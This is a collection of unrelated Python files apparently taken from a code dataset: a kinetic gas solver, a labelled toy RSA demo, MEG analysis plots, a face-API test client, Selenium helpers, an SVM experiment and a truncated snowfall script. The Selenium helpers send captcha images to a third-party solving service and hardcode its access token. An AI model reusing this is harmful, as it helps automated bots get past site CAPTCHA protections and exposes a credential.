bc_data[0]\n hv = vx[1, 0, 0] - vx[0, 0, 0]\n fmax = f_maxwell(vx, vy, vz, T_w, 1., 0., 0., 0., gas_params.Rg)\n Ni = (hv**3) * np.sum(f * np.where(vn > 0, vn, 0.))\n Nr = (hv**3) * np.sum(fmax * np.where(vn < 0, vn, 0.))\n # TODO: replace np.sqrt(2 * np.pi / (gas_params.Rg * T_w))\n # with discrete quadrature, as in the dissertation\n n_wall = - Ni/ Nr\n# n_wall = 2e+23 # temporary\n return n_wall * fmax\n \ndef comp_macro_param_and_j(f, vx, vy, vz, gas_params):\n Rg = gas_params.Rg\n hv = vx[1, 0, 0] - vx[0, 0, 0]\n n = (hv ** 3) * np.sum(f)\n\n ux = (1. / n) * (hv ** 3) * np.sum(vx * f)\n uy = (1. / n) * (hv ** 3) * np.sum(vy * f)\n uz = (1. / n) * (hv ** 3) * np.sum(vz * f)\n \n v2 = vx*vx + vy*vy + vz*vz\n u2 = ux*ux + uy*uy + uz*uz\n \n T = (1. / (3. * n * Rg)) * ((hv ** 3) * np.sum(v2 * f) - n * u2)\n\n Vx = vx - ux\n Vy = vy - uy\n Vz = vz - uz\n\n rho = gas_params.m * n\n\n p = rho * Rg * T\n\n cx = Vx / ((2. * Rg * T) ** (1. / 2.))\n cy = Vy / ((2. * Rg * T) ** (1. / 2.))\n cz = Vz / ((2. * Rg * T) ** (1. / 2.))\n \n c2 = cx*cx + cy*cy + cz*cz\n\n Sx = (1. / n) * (hv ** 3) * np.sum(cx * c2 * f)\n Sy = (1. / n) * (hv ** 3) * np.sum(cy * c2 * f)\n Sz = (1. / n) * (hv ** 3) * np.sum(cz * c2 * f)\n\n mu = gas_params.mu(T)\n\n f_plus = f_maxwell(vx, vy, vz, T, n, ux, uy, uz, gas_params.Rg) * (1. + (4. / 5.) * (1. - gas_params.Pr) * (cx*Sx + cy*Sy + cz*Sz) * (c2 - (5. / 2.)))\n\n
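 # note: the (4/5)*(1-Pr)*(cx*Sx + cy*Sy + cz*Sz)*(c2 - 5/2) factor is the Shakhov\n # (S-model) heat-flux correction to the local Maxwellian; it makes the model\n # collision term reproduce the gas Prandtl number\n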
 J = (f_plus - f) * (p / mu)\n \n nu = p / mu\n \n return J, n, ux, uy, uz, T, nu, rho, p\n\n \ndef solver(gas_params, problem, mesh, nt, vmax, nv, CFL, filename, init = '0'):\n \"\"\"Solve Boltzmann equation with model collision integral \n \n gas_params -- object of class GasParams, contains gas parameters and viscosity law\n \n problem -- object of class Problem, contains list of boundary conditions,\n data for b.c., and function for initial condition\n \n mesh - object of class Mesh\n \n nt -- number of time steps\n \n vmax -- maximum velocity in each direction in velocity mesh\n \n nv -- number of nodes in velocity mesh\n \n CFL -- Courant number\n \n filename -- name of output file for f\n \n init - name of restart file\n \"\"\"\n \n h = np.min(mesh.cell_diam)\n tau = h * CFL / (vmax * (3.**0.5))\n \n hv = 2. * vmax / nv\n vx_ = np.linspace(-vmax+hv/2, vmax-hv/2, nv) # coordinates of velocity nodes\n \n vx, vy, vz = np.meshgrid(vx_, vx_, vx_, indexing='ij')\n \n # set initial condition \n f = np.zeros((mesh.nc, nv, nv, nv))\n if (init == '0'):\n for i in range(mesh.nc):\n x = mesh.cell_center_coo[i, 0]\n y = mesh.cell_center_coo[i, 1]\n z = mesh.cell_center_coo[i, 2]\n f[i, :, :, :] = problem.f_init(x, y, z, vx, vy, vz) \n else:\n# restart from distribution function\n f = np.reshape(np.load(init), (mesh.nc, nv, nv, nv))\n# restart from macroparameters array\n# init_data = np.loadtxt(init)\n# for ic in range(mesh.nc):\n# f[ic, :, :, :] = f_maxwell(vx, vy, vz, init_data[ic, 5], init_data[ic, 0], init_data[ic, 1], init_data[ic, 2], init_data[ic, 3], gas_params.Rg)\n \n # TODO: maybe join f_plus and f_minus in one array\n f_plus = np.zeros((mesh.nf, nv, nv, nv)) # Reconstructed values on the right\n f_minus = np.zeros((mesh.nf, nv, nv, nv)) # reconstructed values on the left\n flux = np.zeros((mesh.nf, nv, nv, nv)) # Flux values\n rhs = np.zeros((mesh.nc, nv, nv, nv))\n df = np.zeros((mesh.nc, nv, nv, nv)) # Array for increments \\Delta f \n vn = np.zeros((mesh.nf, nv, nv, nv))\n for jf in range(mesh.nf):\n vn[jf, :, :, :] = mesh.face_normals[jf, 0] * vx + mesh.face_normals[jf, 1] * vy + mesh.face_normals[jf, 2] * vz\n\n diag = np.zeros((mesh.nc, nv, nv, nv)) # part of diagonal coefficient in implicit scheme\n # precompute diag\n for ic in range(mesh.nc):\n for j in range(6):\n jf = mesh.cell_face_list[ic, j]\n vnp = np.where(mesh.cell_face_normal_direction[ic, j] * vn[jf, :, :, :] > 0,\n mesh.cell_face_normal_direction[ic, j] * vn[jf, :, :, :], 0.)\n diag[ic, :, :, :] += (mesh.face_areas[jf] / mesh.cell_volumes[ic]) * vnp\n # Arrays for macroparameters\n n = np.zeros(mesh.nc)\n rho = np.zeros(mesh.nc)\n ux = np.zeros(mesh.nc)\n uy = np.zeros(mesh.nc)\n uz = np.zeros(mesh.nc)\n p = np.zeros(mesh.nc)\n T = np.zeros(mesh.nc)\n nu = np.zeros(mesh.nc)\n data = np.zeros((mesh.nc, 7))\n\n frob_norm_iter = np.array([])\n\n it = 0\n while(it < nt):\n it += 1\n # reconstruction for inner faces\n # 1st order\n for ic in range(mesh.nc):\n for j in range(6):\n jf = mesh.cell_face_list[ic, j]\n # TODO: think how to do this without 'if'\n if (mesh.cell_face_normal_direction[ic, j] == 1):\n f_minus[jf, :, :, :] = f[ic, :, :, :]\n else:\n f_plus[jf, :, :, :] = f[ic, :, :, :]\n \n # boundary condition\n # loop over all boundary faces\n for j in range(mesh.nbf):\n jf = mesh.bound_face_info[j, 0] # global face index\n bc_num = mesh.bound_face_info[j, 1]\n bc_type = problem.bc_type_list[bc_num]\n bc_data = problem.bc_data[bc_num]\n if (mesh.bound_face_info[j, 2] == 1):\n # TODO: normal velocities
 vn can be pre-computed one time\n # then we can pass to function p.bc only vn\n f_plus[jf, :, :, :] = set_bc(gas_params, bc_type, bc_data, f_minus[jf, :, :, :], vx, vy, vz, vn[jf, :, :, :])\n else:\n f_minus[jf, :, :, :] = set_bc(gas_params, bc_type, bc_data, f_plus[jf, :, :, :], vx, vy, vz, -vn[jf, :, :, :])\n\n # Riemann solver - compute fluxes\n for jf in range(mesh.nf):\n # TODO: Pre-compute array of vn[:] ???\n flux[jf, :, :, :] = mesh.face_areas[jf] * vn[jf, :, :, :] * \\\n np.where((vn[jf, :, :, :] < 0), f_plus[jf, :, :, :], f_minus[jf, :, :, :])\n# flux[jf] = (1. / 2.) * mesh.face_areas[jf] * ((vn * (f_plus[jf, :, :, :] + f_minus[jf, :, :, :])) - (vn_abs * (f_plus[jf, :, :, :] - f_minus[jf, :, :, :])))\n \n # computation of the right-hand side\n rhs[:] = 0.\n for ic in range(mesh.nc):\n # sum up fluxes from all faces of this cell\n for j in range(6):\n jf = mesh.cell_face_list[ic, j]\n rhs[ic, :, :, :] += - (mesh.cell_face_normal_direction[ic, j]) * (1. / mesh.cell_volumes[ic]) * flux[jf, :, :, :]\n # Compute macroparameters and collision integral\n J, n[ic], ux[ic], uy[ic], uz[ic], T[ic], nu[ic], rho[ic], p[ic] = comp_macro_param_and_j(f[ic, :, :, :], vx, vy, vz, gas_params)\n rhs[ic, :, :, :] += J\n \n frob_norm_iter = np.append(frob_norm_iter, np.linalg.norm(rhs))\n # \n # update values - explicit scheme\n #\n f += tau * rhs\n \n if ((it % 50) == 0): \n fig, ax = plt.subplots(figsize = (20,10))\n line, = ax.semilogy(frob_norm_iter/frob_norm_iter[0])\n ax.set(title='$Steps =$' + str(it))\n plt.grid(True)\n plt.savefig('norm_iter.png')\n plt.close()\n \n data[:, 0] = n[:]\n data[:, 1] = ux[:]\n data[:, 2] = uy[:]\n data[:, 3] = uz[:]\n data[:, 4] = p[:]\n data[:, 5] = T[:]\n data[:, 6] = np.zeros(mesh.nc)\n \n write_tecplot(mesh, data, 'tec.dat', ('n', 'ux', 'uy', 'uz', 'p', 'T', 'rank'))\n np.save(filename, np.ravel(f))\n \n Return = namedtuple('Return', ['f', 'n', 'ux', 'uy', 'uz', 'T', 'p', 'frob_norm_iter'])\n \n S = Return(f, n, ux, uy, uz, T, p, frob_norm_iter)\n \n return S\n","sub_path":"code/explicit/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":10947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"227899366","text":"#this is schoolbook RSA and should not be used in practice (e.g. padding must be added...)\n#this version is for demonstration purposes only\n#this version uses Square and Multiply for the exponentiation\n
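#\n#worked example: pubkey = 7 = 0b111, so bin(7)[3:] == '11'; starting from result = base,\n#the loop squares and, for each 1-bit, multiplies: ((base^2 * base)^2 * base) mod n = base^7 mod n\n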
\nplain = 6 #text as number to encrypt\n\np = 11 #choose two primes; both (p and q) need to be kept secret\nq = 7\nn = p*q\nphi = (p-1)*(q-1)\npubkey = 7 #gcd(pubkey,phi)=1\nprivkey = 43 #pubkey*privkey mod phi = 1\n\ndef exp(base, exponent, prim):\n\tresult = base\n\tbinExp=bin(exponent)[3:]\n\tfor i in binExp:\n\t\tresult = result * result\n\t\tif(i == '1'): #compare the bit to '1' explicitly, the character '0' is also truthy\n\t\t\tresult = base * result\n\t\tresult = result % prim\n\treturn result\n\nprint(\"plain: \" + str(plain))\ncipher = exp(plain,pubkey,n)\nprint(\"cipher: \" + str(cipher))\ntext = exp(cipher,privkey,n)\nprint(\"plain again:\" + str(text))\n","sub_path":"02_ciphers/03_asymmetric/RSA/schoolbookRSAWithSquareAndMultiply.py","file_name":"schoolbookRSAWithSquareAndMultiply.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"243649443","text":"import numpy as np\nimport camcan_utils\nimport mfanalysis as mf\nimport mf_config\nimport matplotlib.pyplot as plt\nfrom joblib import Parallel, delayed\nimport os.path as op\nimport mne\nimport os\nimport h5py\nimport visualization_utils as v_utils\nimport hurst_results\nimport classification_utils as clf_utils\nfrom scipy.stats import ttest_rel\nfrom scipy.stats import pearsonr, spearmanr\n\nfrom pylab import rcParams\nrcParams['figure.figsize'] = 12, 8\nrcParams['mathtext.default'] = 'regular'\nrcParams['font.size'] = 20\n\n\n# Load results\nsensor_type = 'mag'\nhurst_data = hurst_results.get_results(sensor_type=sensor_type)\neog_hurst_data = hurst_results.get_results(sensor_type='eog')\n\n\n#-------------------------------------------------------------------------------\n# Averages and topomaps\n#-------------------------------------------------------------------------------\n\n# Load raw to get info about sensor positions\nraw_filename = 'sample_raw.fif'\nraw = mne.io.read_raw_fif(raw_filename)\n# raw = camcan_utils.get_raw(hurst_data.mf_subjects[0], 'rest')\n\n# get sensor positions via layout\npos = mne.find_layout(raw.info).pos[hurst_data.channels_picks, :]\n\nvmax = np.abs(hurst_data.all_hurst_rest.mean(axis=0)).max()\nvmin = -vmax\nv_utils.plot_data_topo(hurst_data.all_hurst_rest.mean(axis=0), pos, vmin = vmin, vmax = vmax, title = 'H rest', cmap = 'seismic')\nv_utils.plot_data_topo(hurst_data.all_hurst_task.mean(axis=0), pos, vmin = vmin, vmax = vmax, title = 'H task', cmap = 'seismic')\nvmax = np.abs((hurst_data.all_hurst_rest - hurst_data.all_hurst_task).mean(axis=0)).max()\nvmin = 0\nv_utils.plot_data_topo(hurst_data.all_hurst_rest.mean(axis=0) - hurst_data.all_hurst_task.mean(axis=0),\n pos, vmin = vmin, vmax = vmax, title = '(H rest) - (H task)', cmap = 'Reds')\nv_utils.plot_data_topo((hurst_data.all_hurst_rest - hurst_data.all_hurst_task).std(axis=0),\n pos, vmin = vmin, vmax = vmax, title = 'Standard deviation of (H rest) - (H task)', cmap = 'Reds')\n\n\n#-------------------------------------------------------------------------------\n# Average log2(S(j, 2))\n#-------------------------------------------------------------------------------\ndef visualize_structure(sensor_name):\n sensor_index = hurst_data.ch_name2index[sensor_name]\n\n log2Sj2_rest = hurst_data.all_log2_Sj_2_rest[:, sensor_index, :]\n log2Sj2_task = hurst_data.all_log2_Sj_2_task[:, sensor_index, :]\n\n v_utils.plot_cumulants_2( [log2Sj2_rest, log2Sj2_task ],\n title ='Mean structure 
function - ' + sensor_name,\n labels = ['rest', 'task'], idx = '$\\log_2(S(j,2))$')\n\ndef visualize_structure_eog(sensor_index):\n log2Sj2_rest = eog_hurst_data.all_log2_Sj_2_rest[:, sensor_index, :]\n log2Sj2_task = eog_hurst_data.all_log2_Sj_2_task[:, sensor_index, :]\n\n v_utils.plot_cumulants_2( [log2Sj2_rest, log2Sj2_task ],\n title ='EOG Mean structure function - channel %d'%(sensor_index+1),\n labels = ['rest', 'task'], idx = '$\\log_2(S(j,2))$')\n\n\nvisualize_structure('MEG0311')\nvisualize_structure('MEG1841')\n\nvisualize_structure_eog(0)\nvisualize_structure_eog(1)\n\nraw.plot_sensors()\nplt.show()\n","sub_path":"visualize_hurst.py","file_name":"visualize_hurst.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"570269915","text":"import main.firebase\nimport requests\nimport base64\nimport json\nimport time\n\nfirebase = main.firebase.FireBase('../strangerdetection-firebase-adminsdk-ndswy-371433d43f.json',\n 'strangerdetection.appspot.com')\n\n\ndef test_server():\n url = firebase.get_image_access_url(\"tien.png\")\n content = requests.get(url).content\n localhost = \"http://127.0.0.1:5000/api/v1/encodings\"\n base64_string = str(base64.b64encode(content))[2:-1]\n\n data = {\n 'user_email': 'tientt@gmail.com',\n 'image': base64_string\n }\n print(json.dumps(data))\n x = requests.post(localhost, json=json.dumps(data))\n print(x.text)\n\n\ndef test_firebase():\n image_name = \"71650dc8-3674-4702-a948-308ae0369a6a.png\"\n print(firebase.get_image_access_url(image_name))\n\n\ndef test_create_new_encoding():\n localhost = \"http://127.0.0.1:5000/api/v1/encodings\"\n with open('../1440_Vladimir_Putin_Wallpaper.jpg', 'rb') as image:\n base64_string = str(base64.b64encode(image.read()))[2:-1]\n data = {\n 'user_email': 'tientt@gmail.com',\n 'image': base64_string\n }\n start = time.time()\n x = requests.post(localhost, json=json.dumps(data))\n end = time.time()\n print(\"Time: \" + str(end - start))\n response_data = json.loads(x.text)\n print(response_data)\n image_name = response_data['image_name']\n url = firebase.get_image_access_url(image_name)\n print(url)\n\n\ndef test_delete_encoding():\n localhost = \"http://127.0.0.1:5000/api/v1/encodings\"\n data = {\n 'image_name': '71d7c0e2-417d-4d27-90f3-51acc14126a3.png'\n }\n start = time.time()\n x = requests.delete(localhost, json=json.dumps(data))\n end = time.time()\n print(\"Time: \" + str(end - start))\n response_data = json.loads(x.text)\n print(response_data)\n\n\ndef test_detect():\n localhost = \"http://127.0.0.1:5000/api/v1/processImage\"\n with open('../tien.png', 'rb') as image:\n base64_string = str(base64.b64encode(image.read()))[2:-1]\n data = {\n 'image': base64_string\n }\n start = time.time()\n x = requests.post(localhost, json=json.dumps(data))\n end = time.time()\n print(\"Time: \" + str(end - start))\n response_data = json.loads(x.text)\n print(response_data)\n\n\nif __name__ == '__main__':\n #test_create_new_encoding()\n # test_delete_encoding()\n test_detect()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"618901937","text":"from bestcaptchasolverapi3.bestcaptchasolverapi import BestCaptchaSolverAPI\nfrom concurrent.futures import ThreadPoolExecutor\nfrom functools import wraps\nimport json\nfrom logging import getLogger\nfrom datetime import datetime\nfrom sys import 
platform, exc_info\nfrom time import sleep, time\n\nfrom django.conf import settings\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\n\nfrom selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException, ElementNotInteractableException, TimeoutException, \\\n ElementClickInterceptedException\nfrom selenium.webdriver import Remote, Chrome, ChromeOptions, DesiredCapabilities\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.expected_conditions import visibility_of_all_elements_located as all_visible, \\\n element_to_be_clickable as clickable, presence_of_element_located as present, url_matches, url_to_be\n\nlogger = getLogger(__name__)\n\nWAIT_001 = 0.01\nWAIT_01 = 0.1\nWAIT_05 = 0.5\nWAIT_075 = 0.75\nWAIT_SEC = 1\n\nJS_SCROLL_DOWN = 'window.scrollTo(0, document.body.scrollHeight)'\n\n\ndef threaded(f, executor=None):\n @wraps(f)\n def wrap(*args, **kwargs):\n return (executor or ThreadPoolExecutor()).submit(f, *args, **kwargs)\n\n return wrap\n\n\n@threaded\ndef hb_solve_captcha_bsc(img_data):\n bcs_access_token = '3C30731306914373BED04F4C4FD4F1AA'\n bcs = BestCaptchaSolverAPI(bcs_access_token)\n if settings.DEBUG:\n balance = bcs.account_balance()\n logger.debug(f'BCS balance: {balance}')\n resp_id = bcs.submit_image_captcha(img_data)\n return bcs.retrieve(resp_id)\n\n\ndef hb_win_size(page, dim):\n S = lambda dim: page.execute_script('return document.body.parentNode.scroll' + dim)\n return S(dim) + 10\n\n\ndef hb_save_elem_screenshot(elem, txt='', force=False):\n if force or settings.SAVE_SCREENSHOTS:\n f_name = f'{settings.BASE_DIR}/logs/{datetime.now().strftime(\"%Y.%m.%d.%H.%M.%S\")}_{txt}_ess.png'\n logger.debug(f'Saving {f_name}')\n try:\n elem.screenshot(f_name)\n except Exception as e:\n logger.error(f'Could not save {f_name}: {e}')\n\n\ndef hb_save_page_screenshot(page, suffix, force=False):\n if force or settings.SAVE_SCREENSHOTS:\n page.set_window_size(hb_win_size(page, 'Width'), hb_win_size(page, 'Height'))\n f_name = f'{settings.BASE_DIR}/logs/{datetime.now().strftime(\"%Y.%m.%d.%H.%M.%S\")}_{suffix.lower()}_pss.png'\n logger.debug(f'Saving {f_name}')\n page.save_screenshot(f_name)\n\n\ndef hb_get_page_screenshot(page):\n page.set_window_size(hb_win_size(page, 'Width'), hb_win_size(page, 'Height'))\n return page.get_screenshot_as_base64()\n\n\ndef hb_save_failed_captcha(img, txt='NO CODE', force=False):\n if force or settings.SAVE_CAPTCHA:\n f_name = f'{settings.MEDIA_ROOT}/captcha/{datetime.now().strftime(\"%Y.%m.%d.%H.%M.%S\")}_{txt}_.png'\n logger.debug(f'Saving {f_name}')\n img.screenshot(f_name)\n\n\ndef hb_get_page(url):\n \"\"\"\n Open Chrome via chromedriver, navigate to url and return the loaded page\n :param url:\n :return: (webdriver object, error message)\n \"\"\"\n t_start = round(time(), 2)\n opts = ChromeOptions()\n opts.add_experimental_option('detach', True)\n opts.headless = settings.BROWSE_HEADLESS\n caps = DesiredCapabilities.CHROME.copy()\n caps['headless'] = settings.BROWSE_HEADLESS\n service_url = 'http://localhost:5780'\n browser = None\n if 'linux' in platform:\n # noinspection PyBroadException\n try:\n browser = Remote(command_executor=service_url, keep_alive=True, desired_capabilities=caps, options=opts)\n logger.info(f'Connected to chromedriver service on {service_url}')\n except:\n logger.error(f'Could not connect to chromedriver service on {service_url} :
 {exc_info()}, trying local Chrome...')\n\n if not browser:\n e_p = '/usr/bin/chromedriver' if 'linux' in platform else 'bin\\\\chromedriver.exe'\n # noinspection PyBroadException\n try:\n browser = Chrome(executable_path=e_p, desired_capabilities=caps, options=opts)\n logger.debug(f'Opened Chrome: {e_p}')\n except:\n msg = f'Could not open Chrome: {exc_info()}'\n logger.error(msg)\n return None, msg\n t_load = round(time(), 2)\n logger.debug(f'Browser loaded in {t_load - t_start} sec')\n\n # TODO: check the influence of maximizing\n # while settings.BROWSE_HEADLESS = True\n\n # noinspection PyBroadException\n try:\n browser.maximize_window()\n except:\n logger.error(f'Can\\'t maximize window: {exc_info()}')\n logger.error(f'Note: settings.BROWSE_HEADLESS={settings.BROWSE_HEADLESS}')\n\n try:\n browser.get(url)\n except TimeoutException as e:\n msg = f'Could not open {url}: {e}'\n logger.error(msg)\n return None, msg\n\n return browser, ''\n\n\ndef hb_set_value(trigger, num_input, value):\n \"\"\"\n Set the value of an input element, handling exceptions.\n Retries 3 times, waiting between attempts.\n :param trigger:\n :param num_input:\n :param value:\n :return: (True, error message if any) if the value was set or (False, error message) otherwise\n \"\"\"\n # total = 4\n total = 3\n # cnt = total - 1\n err_msg = ''\n while total:\n trigger.click()\n sleep(WAIT_05)\n total -= 1\n # noinspection PyBroadException\n try:\n num_input.clear()\n sleep(WAIT_01)\n num_input.send_keys(str(value))\n except ElementNotInteractableException as e:\n err_msg = e.msg\n continue\n except:\n err_msg = exc_info()[1].msg\n continue\n else:\n return True, err_msg\n\n return False, err_msg\n\n\ndef hb_select_value(wait, trigger, dd_xpath):\n \"\"\"\n Select the dropdown option located by dd_xpath, handling exceptions.\n :param wait:\n :param trigger:\n :param dd_xpath:\n :return: (True, '') if the option was clicked or (False, error message) otherwise\n \"\"\"\n trigger.click()\n # noinspection PyBroadException\n try:\n option = wait.until(clickable((By.XPATH, dd_xpath)))\n except:\n err_msg = f'data:image/jpeg;base64,{trigger.screenshot_as_base64}'\n else:\n # noinspection PyBroadException\n try:\n option.click()\n except (ElementNotInteractableException, StaleElementReferenceException, TimeoutException) as e:\n err_msg = e.msg\n except:\n err_msg = f'data:image/jpeg;base64,{trigger.screenshot_as_base64}'\n else:\n return True, ''\n\n return False, err_msg\n\n\ndef hb_look_for(node, xpath):\n \"\"\"\n Look for node's child element, handling exceptions.\n :param node: node\n :param xpath: xpath to check\n :return: (True, element object) or (False, error message) if not found\n \"\"\"\n # noinspection PyBroadException\n try:\n elem = node.find_element_by_xpath(xpath)\n return True, elem\n except (NoSuchElementException, StaleElementReferenceException) as e:\n err_msg = e.msg\n except:\n err_msg = exc_info()[1].msg\n\n if err_msg:\n logger.error(err_msg)\n return False, err_msg\n","sub_path":"_/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"413750619","text":"# -*- coding: utf-8 -*-\n\"\"\"\nProgram description: augment the sample data with a Monte Carlo method, then run recognition to evaluate the recognition efficiency and accuracy on a large sample set.\nAuthor: Liu Jun\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport scipy as sp\nfrom scipy import io as spi\nimport time as tm\nfrom matplotlib import pyplot as plt\nfrom sklearn.svm import SVC\nfrom
 sklearn.model_selection import cross_val_score,train_test_split,validation_curve\n\nfrom sklearn.preprocessing import StandardScaler # normalization\nfrom sklearn.decomposition import PCA\ndef load_Laman():\n '''Load the Raman spectrum data'''\n raw_data = spi.loadmat('../input/XJlaman_4_1.mat')\n x = raw_data['lamanxiangjing']\n y = np.zeros((x.T.shape[0]))\n for i in np.arange(0,30):\n y[i*30:i*30+30,]= i\n return x.T,y\n\ndef load_IMS():\n '''Load the ion mobility spectrometry data'''\n raw_data = spi.loadmat('../input/XJlizi_4_1_1.mat')\n x = raw_data['XJlizi_4_1_1']\n y = np.zeros((x.T.shape[0]))\n for i in np.arange(0,30):\n y[i*30:i*30+30,]= i\n return x.T,y\n'''\nAugment the data:\n1) take the mean of each dimension * 0.001 * (random number - 0.5)\n2) add the original values\n'''\ndef Create_Raman_Data(raw_data_x,raw_data_y,muls=10):\n '''Expand every sample into mul samples'''\n if muls == 1:\n return raw_data_x,raw_data_y\n mul = muls\n [m,n] = raw_data_x.shape\n # build [mul*m,n] matrices\n random_mean = np.ones((m*mul,n)) # random-fluctuation matrix based on the means\n mul_raw_data = np.ones((m*mul,n))\n mul_raw_data_y = np.ones((m*mul,1))\n # replicate raw_data mul times\n for i in range(m):\n mul_raw_data[i*mul:(i+1)*mul,: ] = raw_data_x[i, :]\n mul_raw_data_y[i*mul:(i+1)*mul ] = raw_data_y[i]\n # mean of each dimension\n mean_data = np.mean(raw_data_x, axis=0)\n #\n for i in range(m*mul):\n tp = mean_data * 0.001 * (np.random.ranf(n) - 0.5)\n random_mean[i, :] = tp + random_mean[i, :]\n return (random_mean + mul_raw_data),mul_raw_data_y\n\n[raw_x_ims,raw_y_ims] = load_IMS()\n[raw_x_raman,raw_y_raman] = load_Laman()\n# raw_x = np.concatenate((raw_x_raman,raw_x_ims),axis=1)\nraw_x = raw_x_raman\nraw_y = raw_y_ims\n\nmuls = 100\n# augment the data of the first sample class\n[x1,y1] = Create_Raman_Data(raw_x_raman[0:30,:],raw_y_raman[0:30],muls=muls)\n# save the generated data\nnp.savetxt('x1.txt',x1)\nnp.savetxt('y1.txt',y1)\n\n[x2,y2] = Create_Raman_Data(raw_x_raman[90:120,:],raw_y_raman[90:120],muls=muls)\n# save the generated data\nnp.savetxt('x2.txt',x2)\nnp.savetxt('y2.txt',y2)\n\n\nx1 = np.loadtxt('x1.txt')\ny1 = np.loadtxt('y1.txt')\nx2 = np.loadtxt('x2.txt')\ny2 = np.loadtxt('y2.txt')\n\nx = np.concatenate((x1,x2),axis=0)\ny = np.concatenate((y1,y2),axis=0)\n\n# normalization\nscaler = StandardScaler()\nx = scaler.fit_transform(x)\n\n# dimensionality reduction with PCA\npca = PCA(n_components=10)\npca.fit(x)\nx = pca.transform(x)\n\n# SVM classification\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.1,\n random_state=0)\n# number of training samples\ntrain_num = 2200\n\nprint(train_num)\n# build the training and test sets\nx_train = np.concatenate((x1[0:train_num,:],x2[0:train_num,:]),axis=0)\ny_train = np.concatenate((y1[0:train_num],y2[0:train_num]),axis=0)\n\nx_test = np.concatenate((x1[train_num:,:],x2[train_num:,:]),axis=0)\ny_test = np.concatenate((y1[train_num:],y2[train_num:]),axis=0)\n# time the model training\nt1 = tm.time()\nmodel = SVC(C=0.001, kernel='rbf')\nmodel.fit(x_train,y_train)\nt2 = tm.time()\n# predict on the test samples\ny_test_1 = model.predict(x_test)\n# compute the recognition rate\nresult = np.sum(y_test ==
 y_test_1) / y_test_1.shape[0]\n\nprint('Number of training samples:',x_train.shape[0])\nprint('Number of test samples:',x_test.shape[0])\nprint('Model training time: %f s'%((t2-t1)))\nprint('Recognition rate:',result)\n\n\n'''\nresults = np.zeros((30,3))\ni = 0\nfor train_num in np.arange(1900,2000,500):\n print(train_num)\n # build the training and test sets\n x_train = np.concatenate((x1[0:train_num,:],x2[0:train_num,:]),axis=0)\n y_train = np.concatenate((y1[0:train_num],y2[0:train_num]),axis=0)\n\n x_test = np.concatenate((x1[train_num:,:],x2[train_num:,:]),axis=0)\n y_test = np.concatenate((y1[train_num:],y2[train_num:]),axis=0)\n # time the model training\n t1 = tm.time()\n model = SVC(C=0.001, kernel='rbf')\n model.fit(x_train,y_train)\n t2 = tm.time()\n # predict on the test samples\n y_test_1 = model.predict(x_test)\n # compute the recognition rate\n result = np.sum(y_test == y_test_1) / y_test_1.shape[0]\n\n print('Number of training samples:',x_train.shape[0])\n print('Number of test samples:',x_test.shape[0])\n print('Model training time: %f s'%((t2-t1)))\n print('Recognition rate:',result)\n results[i:,] = [train_num,result,(t2-t1)]\n i= i+1\n\nplt.plot(results[:,0],results[:,1],'bo')\n# plt.plot(results[:,0],results[:,2],'r+')\nplt.show()\n'''\n\n\n\n\n","sub_path":"Apple_essence/样本扩充与识别.py","file_name":"样本扩充与识别.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"116932169","text":"\"\"\"\nIEM Snowfall Analysis Engine\n\n\"\"\"\nimport iemre\nimport iemplot\nimport iemdb\nimport numpy\nimport random\nimport mx.DateTime\nfrom iem.plot import MapPlot\nimport gdal\n\nIEM = iemdb.connect('iem', bypass=True)\nicursor = IEM.cursor()\nPOSTGIS = iemdb.connect('postgis', bypass=True)\npcursor = POSTGIS.cursor()\n\ndef lalo2pt(lat, lon):\n x = int(( -130.0 - lon ) / - 0.01 )\n y = int(( 55.0 - lat ) / 0.01 )\n return x, y\n\ndef sg2pt(lon, lat):\n x = int(( lon - iemre.WEST ) / 0.25 ) \n y = int(( lat - iemre.SOUTH ) / 0.22 )\n return x, y\n\n\ndef init_grid():\n \"\"\"\n Initialize the grid with Q2 data!\n \"\"\"\n lat0 = iemre.SOUTH\n lat1 = iemre.NORTH\n lon0 = iemre.WEST\n lon1 = iemre.EAST\n x0, y0 = lalo2pt(lat1, lon0)\n x1, y1 = lalo2pt(lat0, lon1)\n\n fp = \"/home/ldm/data/gis/images/4326/q2/p48h.png\"\n q2 = gdal.Open(fp, 0)\n q2d = numpy.flipud( q2.ReadAsArray()[y0:y1:22,x0:x1:25] )\n\n return q2d / 25.4 # hard code snow ratio!\n\ndef fetch_lsrs():\n vals = []\n lats = []\n lons = []\n # Query LSR Data...\n pcursor.execute(\"\"\"\n SELECT state, max(magnitude) as val, x(geom) as lon, y(geom) as lat\n from lsrs_2012 WHERE type in ('S') and magnitude > 0 and \n valid > '2012-12-09 00:00' and valid < '2012-12-10 12:00'\n and x(geom) BETWEEN %s and %s and\n y(geom) BETWEEN %s and %s \n GROUP by state, lon, lat\n \"\"\",(iemre.WEST, iemre.EAST, iemre.SOUTH, iemre.NORTH))\n for row in pcursor:\n vals.append( row[1] )\n lats.append( row[3] + (random.random() * 0.01)) \n lons.append( row[2] )\n return {'vals': vals, 'lats': lats, 'lons': lons}\n\ndef fetch_coop():\n vals = []\n lats = []\n lons = []\n icursor.execute(\"\"\"\n SELECT id, sum(snow), x(geom) as lon, y(geom) as lat, count(*) from\n summary_2012 t JOIN stations s ON (s.iemid = t.iemid) where \n (network ~* 'COOP' or network ~* 'COCORAHS') and \n day in ('2012-12-09', 